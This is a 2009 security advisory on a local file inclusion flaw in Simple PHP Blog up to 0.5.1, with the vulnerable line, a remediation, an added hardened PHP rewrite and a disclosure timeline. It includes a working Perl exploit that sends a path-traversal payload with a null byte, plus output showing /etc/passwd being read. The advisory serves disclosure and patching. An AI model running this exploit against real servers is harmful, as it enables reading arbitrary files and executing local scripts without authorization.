=============================================
INTERNET SECURITY AUDITORS ALERT 2009-005
Simple PHP Blog <= 0.5.1 Local File Include vulnerability
Simple PHP Blog is a blog system that does not require a database setup and
is very easy to install.
Simple PHP Blog <= 0.5.1 is affected by a Local File Include
vulnerability in 'languages_cgi.php' because the 'blog_language1'
parameter is not properly sanitized.
The affected code:
62 require_once('languages/' . $_POST[ 'blog_language1' ] . '/strings.php');
Exploit:
#!/usr/bin/perl
use LWP::UserAgent;
if ($#ARGV < 3) { die("Usage: $0 <site> <path> <file> <cookie>"); }
$ua = LWP::UserAgent->new;
$ua->agent("Simple PHP Blog Exploit ^_^");
$ua->default_header('Cookie' => "sid=$ARGV[3]");
my $req = new HTTP::Request POST =>
"http://$ARGV[0]$ARGV[1]/languages_cgi.php";
$req->content_type('application/x-www-form-urlencoded');
$req->content("blog_language1=…/…/…/…/…$ARGV[2]%00");
my $res = $ua->request($req);
if ($res->is_success) {
print $res->content;
} else {
print "Error: " .$res->status_line, "\n";
}
$ perl simple.pl example.com /blog /etc/passwd <my_cookie_here>|head -1
root:*:0:0:root:/root:/bin/bash
The bug can be exploited whether 'magic_quotes_gpc' is On or Off. Note
that if magic_quotes_gpc is set to Off, an attacker can append a '\0'
(null byte) to truncate the path and read any file, such as /etc/passwd;
if it is On, only PHP files can be included, which still allows the
execution of any local PHP file.
The impact is that an attacker can read arbitrary files with the
privileges of the web server and execute arbitrary local PHP scripts.
Versions up to and including 0.5.1 are affected.
To patch the application, the functions file_exists() and basename()
should be added to the affected code. Change line 62 of
languages_cgi.php so that the $_POST[ 'blog_language1' ] variable is
filtered before it is used in the include path:
if (ereg('^[a-zA-Z0-9_]+$', $_POST[ 'blog_language1' ]))
require_once('languages/' . $_POST[ 'blog_language1' ] . '/strings.php');
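As an added example that is not part of the advisory or of the Simple PHP Blog code, the following hardened replacement for line 62 combines the whitelist above with the basename() and file_exists() checks the advisory recommends, and adds a realpath() containment check so that the included file is guaranteed to live under languages/. preg_match() is used instead of ereg() because ereg() is deprecated since PHP 5.3; the function name and the $languages_dir parameter are assumptions.

```php
<?php
// Hardened lookup for the language strings file (added example, not project code).
// Returns the canonical path to languages/<name>/strings.php, or null if the
// supplied name is not a plain directory name or does not resolve under languages/.
function resolve_language_strings($languages_dir, $language)
{
    // Whitelist from the advisory: letters, digits and underscore only.
    // This already rejects '/', '..' and "\0", so traversal and null-byte
    // truncation are impossible regardless of the magic_quotes_gpc setting.
    if (!is_string($language) || !preg_match('/^[a-zA-Z0-9_]+$/', $language)) {
        return null;
    }
    // basename() as defence in depth: strips any path component that could
    // appear if the whitelist were ever loosened.
    $language = basename($language);

    $base      = realpath($languages_dir);
    $candidate = realpath($languages_dir . '/' . $language . '/strings.php');

    // realpath() returns false for a non-existent file; file_exists() keeps the
    // check explicit. The prefix comparison proves the canonical target is
    // inside the canonical languages/ directory (symlinks resolved).
    if ($base === false || $candidate === false || !file_exists($candidate)
        || strpos($candidate, $base . DIRECTORY_SEPARATOR) !== 0) {
        return null;
    }
    return $candidate;
}

// Replacement for the original line 62 of languages_cgi.php.
$requested = isset($_POST['blog_language1']) ? $_POST['blog_language1'] : '';
$strings   = resolve_language_strings(__DIR__ . '/languages', $requested);
if ($strings === null) {
    header('HTTP/1.1 400 Bad Request');
    exit('Invalid language');
}
require_once $strings;
```

Run from the CLI with constructed inputs such as 'en', '../../../../etc/passwd' and "en\0x", only a name whose languages/<name>/strings.php actually exists yields a path; every other input returns null and the script exits with a 400.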
http://www.simplephpblog.com
http://sourceforge.net/projects/sphpblog/
http://www.isecauditors.com
This vulnerability has been discovered and reported
by Juan Galiana Lara (jgaliana (at) isecauditors (dot) com).
March 02, 2009: Initial release.
December 18, 2009: Last revision.
March 02, 2009: Vulnerability acquired by
Internet Security Auditors (www.isecauditors.com)
March 03, 2009: Notified to developer. No response.
December 13, 2009: Notified again. No response.
December 18, 2009: Added mitigation solution and sent to lists.
The information contained within this advisory is supplied "as-is"
with no warranties or guarantees of fitness of use or otherwise.
Internet Security Auditors accepts no responsibility for any damage
caused by the use or misuse of this information.